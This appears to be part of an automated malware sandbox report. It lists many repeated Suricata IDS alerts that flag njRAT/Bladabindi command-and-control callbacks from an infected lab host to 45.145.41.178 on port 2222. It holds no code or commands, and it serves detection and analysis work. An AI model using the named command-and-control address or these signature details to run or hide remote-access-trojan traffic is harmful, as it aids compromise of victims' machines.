Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54051 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54055 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54060 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54038 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54040 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54064 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54029 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54053 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54065 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54064 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54050 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54057 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54059 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54059 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54052 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54062 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54054 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54061 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54010 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54072 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54077 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54058 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54071 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54068 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54079 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54069 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54049 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54073 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54074 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54066 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54063 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54067 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54044 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54082 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54088 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54075 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54090 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54091 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54092 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54090 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54093 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54096 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54070 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54076 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54046 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54098 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54099 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54099 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54083 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54094 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54087 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54056 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54084 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54078 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54104 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54089 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54101 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54097 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54106 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54097 -> 45.145.41.178:2222
